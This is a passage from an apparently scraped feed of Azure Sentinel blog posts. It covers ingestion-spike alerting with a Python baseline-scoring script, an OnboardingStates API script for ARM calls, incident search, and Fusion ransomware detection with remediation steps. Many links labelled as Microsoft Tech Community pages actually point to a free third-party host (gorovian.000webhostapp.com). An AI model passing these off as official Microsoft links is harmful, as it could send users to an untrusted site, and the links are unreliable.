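the KQL ingestion-spike pipeline above.  Kusto's series_decompose_anomalies()
is replaced by a same-weekday median baseline and a robust residual score, so
the score values differ from Kusto's, but the three gates (anomaly score,
minimum increase, percentage increase) follow the query.  All table names,
volumes and defaults below are constructed for the example.
"""
from statistics import median
from typing import Dict, List, Optional

PERIOD = 7  # weekly seasonality, matching the 7 passed to series_decompose_anomalies


def _weeks(pattern: List[float], weeks: int, drift: float) -> List[float]:
    """Repeat a one-week pattern, adding `drift` MB per week (constructed data)."""
    return [float(v + w * drift) for w in range(weeks) for v in pattern]


# Constructed history: 28 days of daily billable volume (MB) per DataType,
# oldest first.  SecurityEvent's last day carries an injected spike
# (expected about 385 MB for that weekday, observed 1900 MB).
SAMPLE_SERIES: Dict[str, List[float]] = {
    "SecurityEvent": _weeks([900, 950, 980, 940, 960, 400, 380], 4, 5),
    "Syslog": _weeks([120, 130, 125, 128, 122, 60, 55], 4, 5),
}
SAMPLE_SERIES["SecurityEvent"][-1] = 1900.0


def seasonal_baseline(values: List[float], period: int = PERIOD) -> List[float]:
    """Expected value per day: the median of the other days at the same phase of
    the cycle (same weekday).  A median keeps one spike from dragging up the
    baseline of its peers."""
    n = len(values)
    out = []
    for i in range(n):
        peers = [values[j] for j in range(i % period, n, period) if j != i]
        out.append(median(peers) if peers else values[i])
    return out


def anomaly_scores(values: List[float], period: int = PERIOD) -> List[float]:
    """Residual divided by the median absolute residual of the whole series,
    floored at 1 MB so a perfectly flat history does not divide by zero."""
    base = seasonal_baseline(values, period)
    resid = [v - b for v, b in zip(values, base)]
    scale = max(median(abs(r) for r in resid), 1.0)
    return [r / scale for r in resid]


def check_spike(values: List[float], upper_threshold: float = 3.0,
                min_increase_mb: float = 100.0, percent_increase: float = 50.0,
                period: int = PERIOD) -> Optional[dict]:
    """Apply the query's gates to the most recent day.  Returns the alert row,
    or None when any gate fails."""
    expected = seasonal_baseline(values, period)[-1]
    score = anomaly_scores(values, period)[-1]
    actual = values[-1]
    increase = actual - expected
    # Percentage relative to the baseline.  The KQL above divides by the actual
    # quantity instead, which caps its figure below 100%; whichever you use,
    # set the PercentIncrease parameter against that definition.
    pct = increase / expected * 100 if expected > 0 else float("inf")
    if score < upper_threshold or increase < min_increase_mb or pct < percent_increase:
        return None
    return {"ExpectedQty": round(expected), "ActualQty": round(actual),
            "PercentageQtyIncrease": round(pct), "Score": round(score, 1)}


def detect_ingestion_spikes(series_by_type: Dict[str, List[float]], **gates) -> Dict[str, dict]:
    """Run check_spike per DataType; return only alerting tables, largest increase first."""
    hits = {}
    for table, values in series_by_type.items():
        row = check_spike(values, **gates)
        if row is not None:
            hits[table] = row
    return dict(sorted(hits.items(), key=lambda kv: kv[1]["PercentageQtyIncrease"], reverse=True))


if __name__ == "__main__":
    for table, row in detect_ingestion_spikes(SAMPLE_SERIES).items():
        print(table, row)
```

<P><FONT size="3">Running the script reports SecurityEvent as the only alert: its last day is roughly five times the same-weekday baseline, whereas Syslog's last day is within the normal weekly drift and passes none of the gates. The percentage here is computed against the expected (baseline) quantity; the KQL divides by the actual quantity, which caps the reported figure below 100%, so the PercentIncrease parameter should be chosen with the query's definition in mind.</FONT></P> <P><FONT size="3">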
The App provides you with the flexibility to determine two thresholds around which the alerting should occur:</FONT></P> <OL> <LI><FONT size="3">The minimum increase in the amount of data in Gigabytes around which alerting should occur. This allows you to suppress alerts triggered by increases you consider immaterial.</FONT></LI> <LI><FONT size="3">The percentage increase in data. This parameter gives you additional flexibility to manage alerting thresholds by specifying what percentage increase you consider worth triggering the anomaly alert on.</FONT></LI> </OL> <P><FONT size="3">To deploy the Ingestion Cost Anomaly App, follow this <A href="#" target="_blank" rel="noopener">link</A> to our GitHub repo. As part of the deployment process, you will need to specify some parameters in the “project details” page that determine the sensitivity of the App in terms of how it responds to ingestion anomalies, as well as define additional settings specific to your environment. The form below highlights the various parameters needed:</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="LogicAppParameters.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298694iEFDA648997319F5C/image-size/large?v=v2&amp;px=999" role="button" title="LogicAppParameters.png" alt="LogicAppParameters.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">When the Logic App runs and detects a billable data ingestion spike in your workspace, an e-mail with contents similar to the one below is sent to the designated recipients:</FONT></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="SampleOutput.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298695iDFC84B7CB11F7002/image-size/large?v=v2&amp;px=999" role="button" title="SampleOutput.png" 
alt="SampleOutput.png" /></span></P> <P>&nbsp;</P> <P><FONT size="3">Related resources:</FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Series_decompose_anomalies() - Azure Data Explorer | Microsoft Docs</A></FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Cost Management in Azure Sentinel - Webinar</A></FONT></P> <P><FONT size="3"><A href="#" target="_blank" rel="noopener">Azure Sentinel pricing</A></FONT></P> <P><FONT size="3"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-alert-playbook/ba-p/2006003" target="_blank" rel="noopener">Ingestion Cost Alert Playbook - Microsoft Tech Community</A></FONT></P> <P>&nbsp;</P> <P><FONT size="3"><EM>Special thanks to <LI-USER uid="215052"></LI-USER>&nbsp;, <LI-USER uid="329567"></LI-USER>&nbsp;and <LI-USER uid="66621"></LI-USER>&nbsp;for their collaboration</EM></FONT></P> <P>&nbsp;</P> Wed, 01 Sep 2021 19:04:54 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/ingestion-cost-spike-detection-playbook/ba-p/2591301 Inwafula 2021-09-01T19:04:54Z What's new: Azure Sentinel Ninja Training Knowledge Check https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-ninja-training-knowledge-check/ba-p/2677696 <P>Announcing the Azure Sentinel Ninja Training knowledge check! Think you're a true Sentinel Ninja? Take the knowledge check and find out. If you pass the knowledge check with a score of 80% or more you can request a certificate to prove your ninja skills!</P> <P>&nbsp;</P> <P>1. Take the knowledge check<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener">here.</A>&nbsp;</P> <P>2. If you score 80% or more in the knowledge check, request your participation certificate<SPAN>&nbsp;</SPAN><A href="#" target="_blank" rel="noopener noreferrer">here</A>. 
If you achieved less than 80%, please review the questions you got wrong, study more and take the assessment again.</P> <P>&nbsp;</P> <P><EM>Note: it can take up to one business day for you to receive your certificate via email.</EM></P> <P>&nbsp;</P> <P>The Azure Sentinel Ninja training forms the basis of the skills and knowledge tested in this exercise and can be accessed&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/become-an-azure-sentinel-ninja-the-complete-level-400-training/ba-p/1246310" target="_blank" rel="noopener">here</A>.</P> <P>&nbsp;</P> Sun, 05 Sep 2021 22:44:45 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-ninja-training-knowledge-check/ba-p/2677696 Sarah_Young 2021-09-05T22:44:45Z What's new: Azure Sentinel new onboarding/offboarding API https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-new-onboarding-offboarding-api/ba-p/2640471 <H2 aria-level="1"><SPAN data-contrast="none">Introduction</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="none">Azure Sentinel is a nested resource on top of a Log Analytics workspace, which introduces some complexity in managing the Azure Sentinel resource on its own. Up until now, onboarding to Azure Sentinel required performing multiple API calls to multiple endpoints. 
When done through the UI this complexity is hidden from the end user, but API users had to handle it themselves.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">To overcome this, we introduce a dedicated endpoint called “OnboardingStates”. This endpoint allows managing the Azure Sentinel instance seamlessly on a workspace through the API. The endpoint provides a single source of truth for performing the different operations required for a complete creation/deletion (aka onboarding/offboarding) of Azure Sentinel on a workspace. </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P aria-level="1">&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">How to use the new API</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">This new API, now in public preview, is documented in our preview API documentation:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/Azure/azure-rest-api-specs/blob/master/specification/securityinsights/resource-manager/Microsoft.SecurityInsights/preview/2021-03-01-preview/OnboardingStates.json</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Some examples&nbsp;on&nbsp;how to use this new API can be found 
here:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">https://github.com/Azure/azure-rest-api-specs/tree/master/specification/securityinsights/resource-manager/Microsoft.SecurityInsights/preview/2021-03-01-preview/examples/onboardingStates</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="1"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><SPAN data-contrast="none">Migration to the new model</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="auto">During the public preview stage both the previous API method and the new API method will work seamlessly. No existing usage will be broken, and customers can expect all current flows to work as expected. The UI component itself has already been changed to use the new API call.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Once this API&nbsp;goes&nbsp;to general availability (GA), we will deprecate the current API. 
We will communicate beforehand to customers regularly using the old method, but&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">customers are expected to start using the new method no later than&nbsp;September 10</SPAN></STRONG><STRONG><SPAN data-contrast="auto">th</SPAN></STRONG><STRONG><SPAN data-contrast="auto">&nbsp;2021.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <H2><SPAN data-contrast="none">Note on the SecurityInsights solution </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></H2> <P><SPAN data-contrast="none">As part of onboarding to Azure Sentinel, the SecurityInsights solution is installed on the Log Analytics workspace. If you had the chance to manage your Azure Sentinel resource(s) using the API in the past, you might have manually installed/removed the&nbsp;SecurityInsights&nbsp;solution on/from the workspace. As part of introducing the new&nbsp;OnboardingStates&nbsp;API, this manual management of the solution will no longer be supported. Hence, you should neither install nor remove the&nbsp;SecurityInsights&nbsp;solution directly. Instead, either use the </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Portal</SPAN></A><SPAN data-contrast="none"> or the&nbsp;OnboardingStates&nbsp;endpoints to manage Azure Sentinel on a workspace. 
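</SPAN></P> <P><SPAN data-contrast="none">As an added example (not Microsoft's code and not the tooling linked in this post), the following Python script builds the three OnboardingStates calls: PUT to onboard, GET to read the state and DELETE to offboard. The URL shape, the fixed resource name “default” and the customerManagedKey property are taken from the OnboardingStates.json specification linked above; the subscription, resource group, workspace name and bearer token are placeholders you must supply.</SPAN></P>

```python
"""Added example, not Microsoft's code: build and (optionally) send the three
OnboardingStates calls that onboard, inspect and offboard Azure Sentinel on a
Log Analytics workspace.  The URL shape, the fixed resource name "default" and
the customerManagedKey property come from the OnboardingStates.json spec; the
subscription, resource group, workspace and token are placeholders.
"""
import json
import urllib.request
from typing import Optional

ARM = "https://management.azure.com"
API_VERSION = "2021-03-01-preview"   # preview version documented in the post


def onboarding_state_url(subscription_id: str, resource_group: str,
                         workspace: str, api_version: str = API_VERSION) -> str:
    """Sentinel is a nested resource under the workspace, so the onboarding
    state sits below the workspace's own ARM path."""
    return (f"{ARM}/subscriptions/{subscription_id}"
            f"/resourceGroups/{resource_group}"
            f"/providers/Microsoft.OperationalInsights/workspaces/{workspace}"
            f"/providers/Microsoft.SecurityInsights/onboardingStates/default"
            f"?api-version={api_version}")


def onboarding_body(customer_managed_key: bool = False) -> dict:
    """PUT body: the only property is whether the workspace uses a customer-managed key."""
    return {"properties": {"customerManagedKey": customer_managed_key}}


def arm_request(method: str, url: str, token: str, body: Optional[dict] = None) -> dict:
    """Send one ARM call with a bearer token (e.g. from `az account get-access-token`).
    Needs network access; returns the parsed JSON body, or {} for an empty response."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Authorization", f"Bearer {token}")
    if data is not None:
        req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req) as resp:
        raw = resp.read()
    return json.loads(raw) if raw else {}


def onboard(sub: str, rg: str, ws: str, token: str, cmk: bool = False) -> dict:
    """Create (onboard) Sentinel on the workspace."""
    return arm_request("PUT", onboarding_state_url(sub, rg, ws), token, onboarding_body(cmk))


def get_state(sub: str, rg: str, ws: str, token: str) -> dict:
    """Read the onboarding state; a 404 (raised by urlopen as HTTPError) means
    Sentinel is not enabled on the workspace."""
    return arm_request("GET", onboarding_state_url(sub, rg, ws), token)


def offboard(sub: str, rg: str, ws: str, token: str) -> dict:
    """Delete (offboard) Sentinel from the workspace."""
    return arm_request("DELETE", onboarding_state_url(sub, rg, ws), token)


if __name__ == "__main__":
    # Placeholder identifiers; supply real ones and a token before calling onboard().
    print(onboarding_state_url("00000000-0000-0000-0000-000000000000", "rg-sentinel", "law-sentinel"))
    print(json.dumps(onboarding_body()))
```

<P><SPAN data-contrast="none">Obtain the token with a tool such as the Azure CLI (az account get-access-token) under an identity that has write permissions on the workspace. The functions only build and send the OnboardingStates request; they make no attempt to install or remove the SecurityInsights solution themselves, which is the point of the note above.</SPAN></P> <P><SPAN data-contrast="none">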
</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">The statement above&nbsp;also applies to the current methods to install the&nbsp;SecurityInsights&nbsp;solution via ARM template&nbsp;(using&nbsp;</SPAN><I><SPAN data-contrast="none">Microsoft.OperationsManagement/solutions</SPAN></I><SPAN data-contrast="none">&nbsp;resource type)&nbsp;or PowerShell&nbsp;(using&nbsp;</SPAN><I><SPAN data-contrast="none">New-AzMonitorLogAnalyticsSolution</SPAN></I><SPAN data-contrast="none">&nbsp;cmdlet). The new&nbsp;OnboardingStates&nbsp;endpoint is already available to be used in ARM templates (see a sample&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">here</SPAN></A><SPAN data-contrast="none">)&nbsp;and&nbsp;we expect to add PowerShell support soon as part of&nbsp;the&nbsp;Az.SecurityInsights&nbsp;module.</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1"><SPAN data-contrast="none">Additional resources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:1,&quot;335551620&quot;:1,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Link to technical&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">documentation</SPAN></A><SPAN data-contrast="auto">&nbsp;- will be replaced by official 
API documentation once the feature becomes GA</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Currently there are still released&nbsp;tools and&nbsp;materials that use the old onboarding method. Over the next few weeks, and before the GA of the new method, we will update these as well to use the new method. These include&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Enable Azure Sentinel (microsoft.com)</SPAN><SPAN data-contrast="none">,</SPAN></A><SPAN data-contrast="none">&nbsp;</SPAN><SPAN data-contrast="none">Sentinel2Go (</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-part1-a-lab-w-prerecorded-data-amp-a-custom/ba-p/1260191" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel To-Go (Part1)</SPAN></A><SPAN data-contrast="none">)&nbsp;</SPAN><SPAN data-contrast="none">and&nbsp;Sentinel All-In-One (</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-all-in-one-accelerator/ba-p/1807933" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel All-In-One Accelerator - Microsoft Tech Community</SPAN></A><SPAN data-contrast="none">)</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Sample ARM template using th</SPAN><SPAN data-contrast="none">e new method.</SPAN></A><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> Mon, 16 Aug 2021 07:39:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-new-onboarding-offboarding-api/ba-p/2640471 Ely_Abramovitch 2021-08-16T07:39:18Z What's new: Incident advanced search is now public! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-incident-advanced-search-is-now-public/ba-p/2627590 <P><SPAN data-preserver-spaces="true">By default, incident searches run across the Incident ID, Title, Tags, Owner, and Product name values only. Now, with the new Advanced search pane, you can scroll down the list to select one or more other parameters to search on.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="liatlishaa_1-1628524992342.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301812i8C4805A2DE73333C/image-size/large?v=v2&amp;px=999" role="button" title="liatlishaa_1-1628524992342.png" alt="liatlishaa_1-1628524992342.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">The advanced fields list includes the following:</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">Alert ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert description</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert name</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Alert severity</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Analytic rule ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Bookmark ID</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Closing comment</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Comments</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Entities</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Incident description</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Reason for 
closing</SPAN></LI> <LI><SPAN data-preserver-spaces="true">Tactics</SPAN></LI> </UL> <P> </P> <P><SPAN data-preserver-spaces="true">We recommend utilizing the Column Selector feature to support the search experience and add the searched columns to the grid view.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="liatlishaa_0-1628524948714.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301811i7DFB40FEE1ECA9B6/image-size/large?v=v2&amp;px=999" role="button" title="liatlishaa_0-1628524948714.png" alt="liatlishaa_0-1628524948714.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">The new UI allows for search by additional incident attributes and across all incidents in your workspace in seconds.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-preserver-spaces="true">You can find more information about the new feature in our <A href="#" target="_self">documentation</A>.</SPAN></P> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you triage and manage security incidents. 
If you have any feedback – about the experience, the usage – or anything else, please let us know.&nbsp;</P> <P>&nbsp;</P> Tue, 10 Aug 2021 09:04:22 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-incident-advanced-search-is-now-public/ba-p/2627590 liatlishaa 2021-08-10T09:04:22Z What’s new: Fusion Detection for Ransomware https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-fusion-detection-for-ransomware/ba-p/2621373 <P>In collaboration with the Microsoft Threat Intelligence Center (MSTIC), we are excited to announce <STRONG>Fusion detection for ransomware </STRONG>is now publicly available!</P> <P>&nbsp;</P> <P>These Fusion detections correlate alerts that are potentially associated with ransomware activities observed at the defense evasion and execution stages during a specific timeframe. Once such ransomware activities are detected&nbsp;and correlated by the Fusion machine learning model, a high severity incident titled “Multiple alerts possibly related to Ransomware activity detected” is triggered in your Azure Sentinel workspace.</P> <P>&nbsp;</P> <P>To help your analysts quickly understand the possible attack, Fusion provides a complete picture of the suspicious activities that happened on the same device/host by correlating signals from Microsoft products with signals from the network and the cloud. Supported data connectors include:</P> <UL> <LI><A href="#" target="_self" data-linktype="relative-path">Azure Defender (Azure Security Center)</A></LI> <LI><A href="#" target="_self" data-linktype="relative-path">Microsoft Defender for Endpoint</A></LI> <LI><A href="#" target="_self" data-linktype="relative-path">Microsoft Defender for Identity</A></LI> <LI><A href="#" data-linktype="relative-path" target="_blank">Microsoft Cloud App Security</A></LI> <LI><A href="#" data-linktype="relative-path" target="_blank">Azure Sentinel scheduled analytics rules</A>. 
Fusion only considers scheduled analytics rules with tactics information.</LI> </UL> <P>&nbsp;</P> <P>The screenshot below shows a Fusion incident with 22 alerts. It correlates low severity signals that were detected around the same timeframe from the network and the host to show a possible ransomware attack and the different techniques used by the attackers.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_0-1628272619612.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301131iDDDE4691ECA56D8F/image-size/large?v=v2&amp;px=999" role="button" title="Sylvie_Liu_0-1628272619612.png" alt="Sylvie_Liu_0-1628272619612.png" /></span></P> <P>&nbsp;</P> <P>For more information, see&nbsp;<A href="#" target="_blank" rel="noopener">Multiple alerts possibly related to Ransomware activity detected</A>.</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>Why Fusion detection for ransomware?</STRONG></H2> <P data-unlink="true">A ransomware attack uses malicious software to make a network or system inaccessible for the purpose of extortion, the ‘ransom’. Ransomware has unquestionably become a top-priority threat for many organizations. 
A <A href="#" target="_self">recent report&nbsp;<SPAN>released by </SPAN>PurpleSec</A> estimated the cost of ransomware attacks at $20 billion in 2020, with downtime increasing by over 200% and costs 23 times higher than in 2019.</P> <P>&nbsp;</P> <P>Preventing such attacks in the first place would be the ideal solution, but with the trend towards ‘ransomware as a service’ and human-operated ransomware, the scope and sophistication of attacks are increasing: attackers use slow, stealthy techniques to compromise a network, which makes them harder to detect in the first place.</P> <P>&nbsp;</P> <P><STRONG>Fusion detection for ransomware captures malicious activities at the defense evasion and execution stages of an attack, giving security analysts an opportunity to quickly understand the suspicious activities that happened around the same timeframe on common entities, connect the dots and take immediate action to disrupt the attack.</STRONG> When it comes to ransomware attacks, time more than anything else is the most important factor in preventing more machines, or the entire network, from being compromised. The sooner such alerts are raised to security analysts with the details of the various attacker activities, the faster the ransomware attack can be contained and remediated. 
A detection like this will help analysts by giving the compilation of attacker activity around execution stage helping reduce MTTD (Mean Time to Detect) and MTTR (Mean Time to Respond).</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>Examples of the Fusion detection for ransomware</STRONG></H2> <P>In the <EM>Incident 1</EM> example, Fusion correlates alerts triggered within a short timeframe on the same device, indicating a possible chain of attacks from how the attackers got in through possible RDP brute-force attack, followed by the use of a ‘Cryptor’ malware and potential phishing activities using malicious document associated with the EUROPIUM activity group, to the detection of Petya and WannaCrypt ransomware in the network.</P> <P>&nbsp;</P> <P><EM><STRONG>Incident 1</STRONG></EM></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_3-1628273507782.png" style="width: 535px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301136i24E84DB4CE968D39/image-dimensions/535x335?v=v2" width="535" height="335" role="button" title="Sylvie_Liu_3-1628273507782.png" alt="Sylvie_Liu_3-1628273507782.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>Incident 2</EM> below is another example of the Fusion ransomware detection that was confirmed as true positive. 
This incident correlates alerts showing ransomware activities at the defense evasion and execution stages on the same host, along with additional suspicious activities detected during the same timeframe, to show you the techniques the attackers may have used to compromise the host.</P> <P>&nbsp;</P> <P><EM><STRONG>Incident 2</STRONG></EM></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sylvie_Liu_0-1628273956261.png" style="width: 535px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301137iFF18B4F1D2B6102D/image-dimensions/535x428?v=v2" width="535" height="428" role="button" title="Sylvie_Liu_0-1628273956261.png" alt="Sylvie_Liu_0-1628273956261.png" /></span></P> <P>&nbsp;</P> <P>In these Fusion incidents, the alerts related to ransomware/malware detection might indicate that the ransomware/malware was stopped from delivering its payload, but it is prudent to check the machine for signs of infection. Attackers may continue malicious activities after the ransomware was prevented, so it is also important that you investigate the entire network to understand the intrusion and identify other machines that might be impacted by this attack.</P> <P><STRONG>&nbsp;</STRONG></P> <H2><STRONG>What’s next after receiving the Fusion detection?</STRONG></H2> <P>After receiving Fusion detections for possible ransomware activities, we recommend checking with the machine owner whether this is intended behavior. If the activity is unexpected, treat the machine as potentially compromised and take immediate action to analyze the techniques the attackers used to compromise the host and to evade detection in this potential ransomware attack. 
Here are the recommended steps:</P> <P>&nbsp;</P> <OL> <LI>Isolate the machine from the network to prevent potential lateral movement.</LI> <LI>Run a full antimalware scan on the machine, following any resulting remediation advice.</LI> <LI>Review installed / running software on the machine, removing any unknown or unwanted packages.</LI> <LI>Revert the machine to a known good state, reinstalling the operating system only if required and restoring software from a verified malware-free source.</LI> <LI>Follow the recommendations from alert providers (e.g. <A href="#" target="_blank" rel="noopener">Azure Security Center</A> and <A href="#" target="_blank" rel="noopener">Microsoft Defender</A>) to prevent future breaches.</LI> <LI>Investigate the entire network to understand the intrusion and identify other machines that might be impacted by this attack.</LI> </OL> <P>&nbsp;</P> <P>As you investigate and close the Fusion incidents, <STRONG>we encourage you to provide feedback on whether this incident was a True Positive, Benign Positive, or a False Positive, along with details in the comments.</STRONG> Your feedback is critical to help Microsoft deliver the highest quality detections!</P> <P>&nbsp;</P> <P>We will continue to release new multistage attack scenarios detected by Fusion in Azure Sentinel; keep an eye on our <A href="#" target="_blank" rel="noopener">Azure Sentinel Fusion</A> page for updates!</P> <P>&nbsp;</P> <P>Relevant readings:</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure Sentinel Fusion</A></LI> <LI><A href="#" target="_blank" rel="noopener">The growing threat of ransomware</A></LI> <LI><A href="#" target="_blank" rel="noopener">Rapidly protect against ransomware and extortion</A></LI> <LI><A href="#" target="_blank" rel="noopener">Ransomware groups continue to target healthcare, critical services; here’s how to reduce risk</A></LI> </UL> 